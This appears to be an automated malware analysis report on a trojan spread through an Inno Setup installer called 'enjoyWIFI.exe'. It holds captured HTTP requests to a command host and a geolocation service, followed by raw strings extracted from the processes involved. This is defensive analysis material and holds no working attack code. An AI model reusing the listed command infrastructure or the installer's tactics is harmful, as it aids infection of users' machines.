GET /black/prisonbreak/3/default.xml HTTP/1.1
Host: room1.360dev.info


HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Mon, 09 Oct 2017 10:13:33 GMT
Content-Type: text/xml; charset=utf-8
Content-Length: 300
Last-Modified: Mon, 09 Oct 2017 10:00:01 GMT
Connection: keep-alive
ETag: "59db48a1-12c"
Accept-Ranges: bytes


GET /xml/ HTTP/1.1
Host: freegeoip.net
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Mon, 09 Oct 2017 10:13:29 GMT
Content-Type: application/xml
Content-Length: 363
Connection: keep-alive
Set-Cookie: __cfduid=d8ffb4ad10c7c47feab97df521061de6f1507544009; expires=Tue, 09-Oct-18 10:13:29 GMT; path=/; domain=.freegeoip.net; HttpOnly
Vary: Origin
X-Database-Date: Thu, 05 Oct 2017 04:08:57 GMT
X-Ratelimit-Limit: 15000
X-Ratelimit-Remaining: 14998
X-Ratelimit-Reset: 2443
Server: cloudflare-nginx
CF-RAY: 3ab09149659e8430-KBP
<Response>
<IP>194.242.96.218</IP>
<CountryCode>UA</CountryCode>
<CountryName>Ukraine</CountryName>
<RegionCode>63</RegionCode>
<RegionName>Kharkivs'ka Oblast'</RegionName>
<City>Kharkiv</City>
<ZipCode></ZipCode>
<TimeZone>Europe/Kiev</TimeZone>
<Latitude>49.9808</Latitude>
<Longitude>36.2527</Longitude>
<MetroCode>0</MetroCode>
</Response>

<<< skipped >>>

The Trojan connects to the servers at the following location(s):

conhost.exe_3120:

.text
`.data
.rsrc
@.reloc
GDI32.dll
USER32.dll
msvcrt.dll
ntdll.dll
API-MS-Win-Core-LocalRegistry-L1-1-0.dll
KERNEL32.dll
IMM32.dll
ole32.dll
OLEAUT32.dll
PutInputInBuffer: EventsWritten != 1 (0x%x), 1 expected
Invalid message 0x%x
InitExtendedEditKeys: Unsupported version number(%d)
Console init failed with status 0x%x
CreateWindowsWindow failed with status 0x%x, gle = 0x%x
InitWindowsStuff failed with status 0x%x (gle = 0x%x)
InitSideBySide failed create an activation context. Error: %d
GetModuleFileNameW requires more than ScratchBufferSize(%d) - 1.
GetModuleFileNameW failed %d.
Invalid EventType: 0x%x
Dup handle failed for %d of %d (Status = 0x%x)
Couldn't grow input buffer, Status == 0x%x
InitializeScrollBuffer failed, Status = 0x%x
CreateWindow failed with gle = 0x%x
Opening Font file failed with error 0x%x
\ega.cpi
NtReplyWaitReceivePort failed with Status 0x%x
ConsoleOpenWaitEvent failed with Status 0x%x
NtCreatePort failed with Status 0x%x
GetCharWidth32 failed with error 0x%x
GetTextMetricsW failed with error 0x%x
GetSystemEUDCRangeW: RegOpenKeyExW(%ws) failed, error = 0x%x
RtlStringCchCopy failed with Status 0x%x
Cannot allocate 0n%d bytes
|%SWj
O.fBf;
ReCreateDbcsScreenBuffer failed. Restoring to CP=%d
Invalid Parameter: 0x%x, 0x%x, 0x%x
ConsoleKeyInfo buffer is full
Invalid screen buffer size (0x%x, 0x%x)
SetROMFontCodePage: failed to memory allocation %d bytes
FONT.NT
Failed to set font image. wc=x, sz=(%x,%x)
Failed to set font image. wc=x sz=(%x, %x).
Failed to set font image. wc=x sz=(%x,%x)
FullscreenControlSetColors failed - Status = 0x%x
FullscreenControlSetPalette failed - Status = 0x%x
WriteCharsFromInput failed 0x%x
WriteCharsFromInput failed %x
RtlStringCchCopyW failed with Status 0x%x
CreateFontCache failed with Status 0x%x
FTPh
\>.Sj
GetKeyboardLayout
MapVirtualKeyW
VkKeyScanW
GetKeyboardState
UnhookWindowsHookEx
SetWindowsHookExW
GetKeyState
ActivateKeyboardLayout
GetKeyboardLayoutNameA
GetKeyboardLayoutNameW
_amsg_exit
_acmdln
ShipAssert
NtReplyWaitReceivePort
NtCreatePort
NtEnumerateValueKey
NtQueryValueKey
NtOpenKey
NtAcceptConnectPort
NtReplyPort
SetProcessShutdownParameters
GetCPInfo
conhost.pdb
%$%a%b%V%U%c%Q%W%]%\%[%
%<%^%_%Z%T%i%f%`%P%l%g%h%d%e%Y%X%R%S%k%j%
version="5.1.0.0"
name="Microsoft.Windows.ConsoleHost"
<requestedExecutionLevel
name="Microsoft.Windows.ConsoleHost.SystemDefault"
publicKeyToken="6595b64144ccf1df"
name="Microsoft.Windows.SystemCompatible"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
< =$>:>@>
2%2X2
%SystemRoot%
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Console\TrueTypeFont
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Console\FullScreen
WindowSize
ColorTableu
ExtendedEditkeyCustom
ExtendedEditKey
Software\Microsoft\Windows\CurrentVersion
\ !:=/.<>;|&
%d/%d
cmd.exe
desktop.ini
\console.dll
%d/%d
6.1.7601.17641 (win7sp1_gdr.110623-1503)
CONHOST.EXE
Windows
Operating System
6.1.7601.17641

SearchProtocolHost.exe_3552:

.text
`.data
.rsrc
@.reloc
ADVAPI32.dll
ntdll.DLL
KERNEL32.dll
msvcrt.dll
USER32.dll
ole32.dll
OLEAUT32.dll
TQUERY.DLL
MSSHooks.dll
IMM32.dll
SHLWAPI.dll
SrchCollatorCatalogInfo
SrchDSSLogin
SrchDSSPortManager
SrchPHHttp
SrchIndexerQuery
SrchIndexerProperties
SrchIndexerPlugin
SrchIndexerClient
SrchIndexerSchema
Msidle.dll
Failed to get REGKEY_FLTRDMN_MS_TO_IDLE, using default
pfps->psProperty.ulKind is LPWSTR but psProperty.lpwstr is NULL or empty
d:\win7sp1_gdr\enduser\mssearch2\common\utils\crchash.cxx
d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrdmn\fltrdaemon.cxx
d:\win7sp1_gdr\enduser\mssearch2\search\common\include\secutil.hxx
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracerhelpers.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp
d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx
RegDeleteKeyW
RegDeleteKeyExW
8%uiP
Invalid parameter passed to C runtime function.
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp
-d-d-d-d-d-d-d-%d
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h
</MSG></TRC>
<MSG>
<ERR> 0xx=
<LOC> %s(%d) </LOC>
tid="0x%x"
pid="0x%x"
tagname="%s"
tagid="0x%x"
el="0x%x"
time="d/d/d d:d:d.d"
logname="%s"
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx
SHELL32.dll
PROPSYS.dll
ntdll.dll
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegEnumKeyExW
ReportEventW
_amsg_exit
MsgWaitForMultipleObjects
SearchProtocolHost.pdb
2 2(20282|2
4%5S5
Software\Microsoft\Windows Search
https
kernel32.dll
msTracer.dll
msfte.dll
lX-X-X-XX-XXXXXX
SOFTWARE\Microsoft\Windows Search
tquery.dll
%s\%s
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
Windows Search Service
<Exception><HR>0xx</HR><eip>%p</eip><module>%S</module><line>%d</line></Exception>
advapi32.dll
WAPI-MS-Win-Core-LocalRegistry-L1-1-0.dll
winhttp.dll
Software\Microsoft\Windows Search\Tracing
Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported
Software\Microsoft\Windows Search\Tracing\EventThrottleState
<MSG>
<LOC> %S(%d) </LOC>
tagname="%S"
logname="%S"
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
.\%s.mui
.\%s\%s.mui
%s\%s.mui
%s\%s\%s.mui
Microsoft Windows Search Protocol Host
7.00.7601.17610 (win7sp1_gdr.110503-1502)
SearchProtocolHost.exe
Windows
7.00.7601.17610

%original file name%.exe_644_rwx_005D0000_00010000:

%UUUU

SearchFilterHost.exe_1952:

.text
`.data
.rsrc
@.reloc
ADVAPI32.dll
ntdll.DLL
KERNEL32.dll
msvcrt.dll
USER32.dll
ole32.dll
OLEAUT32.dll
TQUERY.DLL
IMM32.dll
MSSHooks.dll
mscoree.dll
SHLWAPI.dll
d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrhost\bufstm.cxx
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp
RegDeleteKeyW
RegDeleteKeyExW
8%uiP
d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx
Invalid parameter passed to C runtime function.
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp
-d-d-d-d-d-d-d-%d
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegEnumKeyExW
ReportEventW
_amsg_exit
SearchFilterHost.pdb
version="5.1.0.0"
name="Microsoft.Windows.Search.MSSFH"
<requestedExecutionLevel
3 3(30383|3
kernel32.dll
Software\Microsoft\Windows Search
SOFTWARE\Microsoft\Windows Search
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
Windows Search Service
tquery.dll
advapi32.dll
API-MS-Win-Core-LocalRegistry-L1-1-0.dll
<Exception><HR>0xx</HR><eip>%p</eip><module>%S</module><line>%d</line></Exception>
Software\Microsoft\Windows Search\Tracing
Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported
Software\Microsoft\Windows Search\Tracing\EventThrottleState
<MSG>
<ERR> 0xx=
<LOC> %S(%d) </LOC>
tid="0x%x"
pid="0x%x"
tagname="%S"
tagid="0x%x"
el="0x%x"
time="d/d/d d:d:d.d"
logname="%S"
</MSG></TRC>
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
.\%s.mui
.\%s\%s.mui
%s\%s.mui
%s\%s\%s.mui
%s\%s
winhttp.dll
Microsoft Windows Search Filter Host
7.00.7601.17610 (win7sp1_gdr.110503-1502)
SearchFilterHost.exe
Windows
7.00.7601.17610

enjoyWIFI.exe_4004:

.idata
.rdata
P.reloc
P.rsrc
kernel32.dll
.DEFAULT\Control Panel\International
File I/O error %d
lzmadecompsmall: Compressed data is corrupted (%d)
lzmadecompsmall: %s
LzmaDecode failed (%d)
shell32.dll
/SL5="$%x,%d,%d,
Inno Setup Setup Data (5.4.2)
Inno Setup Messages (5.1.11)
user32.dll
oleaut32.dll
advapi32.dll
RegOpenKeyExA
RegCloseKey
GetWindowsDirectoryA
MsgWaitForMultipleObjects
ExitWindowsEx
comctl32.dll
name="JR.Inno.Setup"
version="1.0.0.0"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
<windowsSettings>
<dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
</windowsSettings>
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
!'%s' is not a valid integer value('%s' is not a valid floating point value
'%s' is not a valid date
'%s' is not a valid time!'%s' is not a valid date and time
I/O error %d
Integer overflow Invalid floating point operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Operation aborted%Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'
Invalid variant operation"Variant method calls not supported
External exception %x
1.0.0.1
1.0.0.1

enjoyWIFI.tmp_2584:

.idata
.rdata
P.reloc
P.rsrc
kernel32.dll
%s_%d
windows
PasswordChar
OnKeyDown,
OnKeyPress
OnKeyUpD
ssHorizontal
OnKeyUp
OnKeyUp\nA
uxtheme.dll
comctl32.dll
RegDeleteKeyExA
advapi32.dll
.DEFAULT\Control Panel\International
user32.dll
shlwapi.dll
TPSExec
TPSRuntimeClassImporter
TPSExportedVar
Cannot Import
Interface not supported
Uh.RC
TPSCustomDebugExec
TPSDebugExec
Monochrome
SHORTCUTTOKEY
ArrowKeys
THKInvalidKey
THKInvalidKeys
TCustomHotKey
THotKey
HotKey
InvalidKeys<
vsReport
OnKeyUp4
Control '%s' has no parent window
Parent given is not a parent of '%s'
msctls_hotkey32
OnKeyDown
InvalidKeys
oleacc.dll
Uh.UE
RICHED20.DLL
RICHED32.DLL
TPasswordEdit
TPasswordEditP
PasswordEdit*
Password
c:\directory
Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
shell32.dll
File I/O error %d
Messages file "%s" is missing. Please correct the problem or obtain a new copy of the program.
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
WININIT.INI
t.Htb
Software\Microsoft\Windows\CurrentVersion\SharedDLLs
RegCreateKeyEx
RegOpenKeyEx
sfc.dll
cmd.exe" /C "
COMMAND.COM" /C
PendingFileRenameOperations
PendingFileRenameOperations2
Software\Microsoft\Windows\CurrentVersion\Fonts
Software\Microsoft\Windows NT\CurrentVersion\Fonts
IPropertyStore::SetValue(PKEY_AppUserModel_ID)
IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall)
OLEAUT32.DLL
Log opened. (Time zone: UTC%s%.2u:%.2u)
%s Log %s #%.3u.txt
MsgWaitForMultipleObjects
regsvr32.exe"
Spawning _RegDLL.tmp
_isetup\_RegDLL.tmp
_RegDLL.tmp %u %u
REGDLL failed with exit code 0x%x
REGDLL mutex wait failed (%d, %d)
REGDLL returned unknown result code %d
Cannot register 64-bit DLLs on this version of Windows
HELPER_EXE_AMD64
Cannot utilize 64-bit features on this version of Windows
64-bit helper EXE wasn't extracted
\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x
CreateNamedPipe
SetNamedPipeHandleState
helper %d 0x%x
Helper process PID: %u
Stopping 64-bit helper process. (PID: %u)
Helper process exited with failure code: 0x%x
TransactNamedPipe
TransactNamedPipe/GetOverlappedResult
Helper: Command did not execute
SOFTWARE\Microsoft\.NETFramework
.NET Framework not found
SOFTWARE\Microsoft\.NETFramework\Policy\v4.0
v4.0.30319
SOFTWARE\Microsoft\.NETFramework\Policy\v2.0
v2.0.50727
SOFTWARE\Microsoft\.NETFramework\Policy\v1.1
v1.1.4322
.NET Framework version %s not found
Fusion.dll
Failed to load .NET Framework DLL "%s"
Failed to get address of .NET Framework CreateAssemblyCache function
.NET Framework CreateAssemblyCache function failed
MoveFileEx failed (%d).
Deleting directory: %s
Failed to delete directory (%d). Will retry later.
Failed to delete directory (%d). Will delete on restart (if empty).
Failed to delete directory (%d).
Deleting file: %s
Failed to delete the file; it may be in use (%d).
ExtractRecData: Unicode data unsupported by this build
The file appears to be in use (%d). Will delete on restart.
Decrementing shared count (%d-bit): %s
Unregistering 64-bit DLL/OCX: %s
Unregistering 32-bit DLL/OCX: %s
Not unregistering DLL/OCX again: %s
Unregistering 64-bit type library: %s
Unregistering 32-bit type library: %s
Uninstalling from GAC: %s
Running Exec filename:
Running Exec parameters:
CreateProcess failed (%d).
Process exit code: %u
Running ShellExec filename:
Running ShellExec parameters:
ShellExecuteEx failed (%d).
Skipping RunOnceId "%s" filename: %s
Unregistering font: %s
zlib: Internal error. Code %d
1.2.1
bzlib: Internal error. Code %d
lzmadecomp: %s
lzmadecomp: Compressed data is corrupted (%d)
DecodeToBuf failed (%d)
%s-%d.bin
%s-%d%s.bin
..\DISK%d\
Asking user for new disk containing "%s".
Cannot read an encrypted file before the key has been set
LoggedMsgBox returned an unexpected value. Assuming Abort.
Software\Microsoft\Windows\CurrentVersion\Uninstall\
5.4.2.ee2 (a)
URLInfoAbout
URLUpdateInfo
Creating directory: %s
Setting permissions on directory: %s
Failed to set permissions on directory (%d).
Setting NTFS compression on directory: %s
Unsetting NTFS compression on directory: %s
Failed to set NTFS compression state (%d).
IMsg
Failed to set value in Fonts registry key.
Failed to open Fonts registry key.
Setting permissions on file: %s
Failed to set permissions on file (%d).
Setting NTFS compression on file: %s
Unsetting NTFS compression on file: %s
Uh.NG
Dest filename: %s
Dest file is protected by Windows File Protection.
Time stamp of our file: %s
Time stamp of existing file: %s
Version of our file: %u.%u.%u.%u
Version of existing file: %u.%u.%u.%u
Existing file is protected by Windows File Protection. Skipping.
GetPassword
Uninstaller requires administrator: %s
The existing file appears to be in use (%d). Will replace on restart.
The existing file appears to be in use (%d). Retrying.
Registering file as a font ("%s")
Cannot install files to 64-bit locations on this version of Windows
desktop.ini
.ShellClassInfo
{0AFACED1-E828-11D1-9187-B532F1E9575D}
target.lnk
Filename: %s
Desktop.ini
Software\Microsoft\Windows\CurrentVersion\App Paths\
Setting permissions on registry key: %s\%s
Could not set permissions on the registry key because it currently does not exist.
Failed to set permissions on registry key (%d).
Cannot access 64-bit registry keys on this version of Windows
Registration executable created: %s
Software\Microsoft\Windows\CurrentVersion\RunOnce
Registering 64-bit DLL/OCX: %s
Registering 32-bit DLL/OCX: %s
Registering 64-bit type library: %s
Registering 32-bit type library: %s
Directory for uninstall files: %s
Will append to existing uninstall log: %s
Will overwrite existing uninstall log: %s
Creating new uninstall log: %s
LoggedMsgBox returned an unexpected value. Assuming Cancel.
Fatal exception during installation process (%s):
ExtractTemporaryFile: The file "%s" was not found
ExtractTemporaryFileEx: The file "%s" was not found
ExtractTemporaryFileToStream: The file "%s" was not found
ExtractTemporaryFileSize: The file "%s" was not found
ExtractTemporaryFileToBuffer: The file "%s" was not found
Invalid symbol '%s' found
Invalid token '%s' found
QuerySpawnServer: Unexpected response: $%x
CallSpawnServer: Unexpected response: $%x
CallSpawnServer: Unexpected status: %d
ShellExecuteEx
ShellExecuteEx returned hProcess=0
Wnd=$%x
FormKeyDown
Software\Microsoft\Windows\CurrentVersion\Uninstall
%s\%s
PasswordCheckHash
Expression error '%s'
Cannot evaluate "%s" constant during Uninstall
Cannot access a 64-bit key in a "reg" constant on this version of Windows
Unknown custom message name "%s" in "cm" constant
srcexe
Cannot expand "pf64" constant on this version of Windows
Cannot expand "cf64" constant on this version of Windows
uninstallexe
Cannot expand "dotnet2064" constant on this version of Windows
Cannot expand "dotnet4064" constant on this version of Windows
Failed to expand shell folder constant "%s"
Unknown constant "%s"
Software\Microsoft\Windows\CurrentVersion
SOFTWARE\Microsoft\Windows NT\CurrentVersion
cmd.exe
COMMAND.COM
\_RegDLL.tmp
REGDLL_EXE
\_setup64.tmp
_isetup\_shfoldr.dll
Failed to get version numbers of _shfoldr.dll
shfolder.dll
Failed to load DLL "%s"
Found pending rename or delete that matches one of our files: %s
Windows version: %u.%u.%u%s (NT platform: %s)
64-bit Windows: %s
Processor architecture: %s
Defaulting to %s for suppressed message box (%s):
Message box (%s):
User chose %s.
MsgBox failed.
/SPAWNWND=$%x /NOTIFYWND=$%x
64-bit install mode: %s
%d.%d
_isetup\_isdecmp.dll
_isetup\_iscrypt.dll
CheckPassword
/Password=
/SuppressMsgBoxes
/DETACHEDMSG
-0.bin
Setup version: Inno Setup version 5.4.2.ee2 (a)
Original Setup EXE:
Windows NT
Windows
Not restarting Windows because Setup is being run from the debugger.
Restarting Windows.
Inno Setup version 5.4.2 (a)
Portions Copyright (C) 2000-2011 Martijn Laan
hXXp://VVV.innosetup.com/
hXXp://VVV.remobjects.com/ps
Email:86186588@qq.com
Cannot run files in 64-bit locations on this version of Windows
Type: Exec
Type: ShellExec
Need to restart Windows? %s
Will not restart Windows automatically.
System\CurrentControlSet\Control\Windows
PasswordPage
PasswordLabel8
PasswordEdit<
PasswordEditLabel@
Could not find page with ID %d
PrepareToInstall failed: %s
/:*?"<>|
\/:*?"<>|
TOutputMsgWizardPage
TOutputMsgWizardPagel
TOutputMsgMemoWizardPage
TOutputMsgMemoWizardPage
Cannot assign a %s to a %s
Date exceeds maximum of %s
Date is less than minimum of %s
System Error. Code: %d.
PasswordLabel
PasswordEdit
PasswordEditLabel
MsgLabel
Msg1Label
Msg2Label
function CreateOutputMsgPage(const AfterID: Integer; const ACaption, ADescription, AMsg: String): TOutputMsgWizardPage;
function CreateOutputMsgMemoPage(const AfterID: Integer; const ACaption, ADescription, ASubCaption: String; const AMsg: AnsiString): TOutputMsgMemoWizardPage;
function MsgBox(const Text: String; const Typ: TMsgBoxType; const Buttons: Integer): Integer;
function GetIniString(const Section, Key, Default, Filename: String): String;
function GetIniInt(const Section, Key: String; const Default, Min, Max: Longint; const Filename: String): Longint;
function GetIniBool(const Section, Key: String; const Default: Boolean; const Filename: String): Boolean;
function IniKeyExists(const Section, Key, Filename: String): Boolean;
function SetIniString(const Section, Key, Value, Filename: String): Boolean;
function SetIniInt(const Section, Key: String; const Value: Longint; const Filename: String): Boolean;
function SetIniBool(const Section, Key: String; const Value: Boolean; const Filename: String): Boolean;
procedure DeleteIniEntry(const Section, Key, Filename: String);
function GetCmdTail: String;
function StringChangeEx(var S: String; const FromStr, ToStr: String; const SupportDBCS: Boolean): Integer;
function RegValueExists(const RootKey: Integer; const SubKeyName, ValueName: String): Boolean;
function RegQueryStringValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultStr: String): Boolean;
function RegQueryMultiStringValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultStr: String): Boolean;
function RegDeleteKeyIncludingSubkeys(const RootKey: Integer; const SubkeyName: String): Boolean;
function RegDeleteKeyIfEmpty(const RootKey: Integer; const SubkeyName: String): Boolean;
function RegKeyExists(const RootKey: Integer; const SubKeyName: String): Boolean;
function RegDeleteValue(const RootKey: Integer; const SubKeyName, ValueName: String): Boolean;
function RegGetSubkeyNames(const RootKey: Integer; const SubKeyName: String; var Names: TArrayOfString): Boolean;
function RegGetValueNames(const RootKey: Integer; const SubKeyName: String; var Names: TArrayOfString): Boolean;
function RegQueryDWordValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultDWord: Cardinal): Boolean;
function RegQueryBinaryValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultStr: AnsiString): Boolean;
function RegWriteStringValue(const RootKey: Integer; const SubKeyName, ValueName, Data: String): Boolean;
function RegWriteExpandStringValue(const RootKey: Integer; const SubKeyName, ValueName, Data: String): Boolean;
function RegWriteMultiStringValue(const RootKey: Integer; const SubKeyName, ValueName, Data: String): Boolean;
function RegWriteDWordValue(const RootKey: Integer; const SubKeyName, ValueName: String; const Data: Cardinal): Boolean;
function RegWriteBinaryValue(const RootKey: Integer; const SubKeyName, ValueName: String; const Data: AnsiString): Boolean;
function MsgBoxEx(hWnd: Longword; AText, ACaption: string; AType, AIcon: Longword; ATimeOut: Integer): Integer;
function InputBoxEx(hWnd: Longword; AText, ACaption, ADefaut, APasswordChar: string; AIcon: Longword; AWidth, AHeight, ATimeOut: Integer; var AResultStr: String): Boolean;
procedure SetPassword(const Password: String);
function CheckForMutexes(Mutexes: String): Boolean;
function Exec(const Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ResultCode: Integer): Boolean;
function ExecAsOriginalUser(const Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ResultCode: Integer): Boolean;
function ShellExec(const Verb, Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ErrorCode: Integer): Boolean;
function ShellExecAsOriginalUser(const Verb, Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ErrorCode: Integer): Boolean;
function MakePendingFileRenameOperationsChecksum: String;
function CreateShellLink(const Filename, Description, ShortcutTo, Parameters, WorkingDir, IconFilename: String; const IconIndex, ShowCmd: Integer): String;
function ExitSetupMsgBox: Boolean;
function GetWindowsVersion: Cardinal;
procedure GetWindowsVersionEx(var Version: TWindowsVersion);
function GetWindowsVersionString: String;
function SuppressibleMsgBox(const Text: String; const Typ: TMsgBoxType; const Buttons, Default: Integer): Integer;
function CustomMessage(const MsgName: String): String;
function SendMessage(const Wnd: HWND; const Msg, WParam, LParam: Longint): Longint;
function PostMessage(const Wnd: HWND; const Msg, WParam, LParam: Longint): Boolean;
function SendNotifyMessage(const Wnd: HWND; const Msg, WParam, LParam: Longint): Boolean;
function SendBroadcastMessage(const Msg, WParam, LParam: Longint): Longint;
function PostBroadcastMessage(const Msg, WParam, LParam: Longint): Boolean;
function SendBroadcastNotifyMessage(const Msg, WParam, LParam: Longint): Boolean;
procedure RaiseException(const Msg: String);
function SetSetupPreviousData(const PreviousDataKey: Integer; const ValueName, ValueData: String): Boolean;
function SetPreviousData(const PreviousDataKey: Integer; const ValueName, ValueData: String): Boolean;
Remove shared file %s? User chose %s%s
/INITPROCWND=$%x
/SECONDPHASE="%s" /FIRSTPHASEWND=$%x
Original Uninstall EXE:
Install was done in 64-bit mode but not running 64-bit Windows now
Removed all? %s
Not restarting Windows because Uninstall is being run from the debugger.
IMsgt
Cannot call "%s" function during Setup
Cannot call "%s" function during Uninstall
Cannot call "%s" function during non Unicode Setup or Uninstall
CREATEOUTPUTMSGPAGE
CREATEOUTPUTMSGMEMOPAGE
MSGBOX
Invalid RootKey value
INIKEYEXISTS
GETCMDTAIL
REGKEYEXISTS
REGDELETEKEYINCLUDINGSUBKEYS
REGDELETEKEYIFEMPTY
REGGETSUBKEYNAMES
MSGBOXEX
SETPASSWORD
CHECKFORMUTEXES
SHELLEXEC
SHELLEXECASORIGINALUSER
MAKEPENDINGFILERENAMEOPERATIONSCHECKSUM
Unknown custom message name "%s"
EXITSETUPMSGBOX
GETWINDOWSVERSION
GETWINDOWSVERSIONSTRING
%u.%.2u.%u
SUPPRESSIBLEMSGBOX
%u.%u.%u.%u
Cannot disable FS redirection on this version of Windows
GetWindowsVersionEx
Runtime Error (at %d:%d):
Exception "%s" at address %p
TScriptRunner.SetPSExecParameters: Invalid type
TScriptRunner.LoadScript failed
TWindowState
poProportional
KeyPreview
WindowState
CTL3D32.DLL
JumpID("","%s")
EInvalidOperation
TKeyEvent
TKeyPressEvent
crSQLWait
EInvalidGraphicOperation
msimg32.dll
isRS-???.tmp
isRS-%.3u.tmp
DisableProcessWindowsGhosting
FTPF0P
0123456789abcdefInno Setup Setup Data (5.4.2)
Inno Setup Messages (5.1.11)
oleaut32.dll
RegQueryInfoKeyA
RegOpenKeyExA
RegEnumKeyExA
RegDeleteKeyA
RegCreateKeyExA
RegCloseKey
GetWindowsDirectoryA
CreateNamedPipeA
mpr.dll
version.dll
gdi32.dll
SetViewportOrgEx
UnhookWindowsHookEx
SetWindowsHookExA
MapVirtualKeyA
GetKeyState
GetKeyNameTextA
ExitWindowsEx
EnumWindows
EnumThreadWindows
winspool.drv
comdlg32.dll
ole32.dll
ShellExecuteExA
ShellExecuteA
.text
`.rdata
@.data
.pdata
@.rsrc
COMCTL32.dll
SHLWAPI.dll
SetProcessShutdownParameters
KERNEL32.dll
ADVAPI32.dll
SHELL32.dll
OLEAUT32.dll
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
`.data
.rsrc
@.reloc
Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
SOFTWARE\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion\ProfileReconciliation
RegKey
GetWindowsDirectoryW
RegOpenKeyA
SHFOLDER.dll
dll\shfolder.dbg
Font.Color
Font.Height
Font.Name
Font.Style
name="JR.Inno.Setup"
version="1.0.0.0"
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
<windowsSettings>
<dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
</windowsSettings>
Cannot create file %s
Cannot open file %s
Stream write error Out of memory while expanding memory stream*Can't write to a read-only resource stream.WriteObject called twice for the same instance
Class %s not found
Resource %s not found!Resource %s is of incorrect class
List index out of bounds Operation not allowed on sorted string list%String list does not allow duplicates
Tab index out of bounds#A component named %s already exists$''%s'' is not a valid component name
A class named %s already exists#''%s'' is not a valid integer value
Error reading %s.%s: %s
Ancestor for '%s' not found
Bitmap is empty!Cannot change the size of an icon$Unknown picture file extension (.%s)
Unsupported clipboard format
Error creating window Cannot focus a disabled or invisible window!Control '%s' has no parent window
%s property out of range
%s on %s@GroupIndex cannot be less than a previous menu item's GroupIndex2Cannot have more than one MDI form per application
Could not load CARDS.DLL
Duplicate CardId found"An error returned from DDE ($0%x)/DDE Error - conversation not established ($0%x)0Error occurred when DDE ran out of memory ($0%x)"Unable to connect DDE conversation
Grid too large for operation Too many rows or columns deleted
%s on line %d
''%s'' expected
%s expected
Invalid input value7Invalid input value. Use escape key to abandon changes
Value must be between %d and %d<Cannot create a default method name for an unnamed component
''%s'' is not a valid date
''%s'' is not a valid time#''%s'' is not a valid date and time
Invalid file name - %s
All files (*.*)|*.*
&Files: (*.*)
Invalid clipboard format Clipboard does not support Icons
Custom Colors Operation not supported on selected printer.There is no default printer currently selected
Unable to write to %s
Invalid data type for '%s'
Failed to create key %s
Failed to set data for '%s'
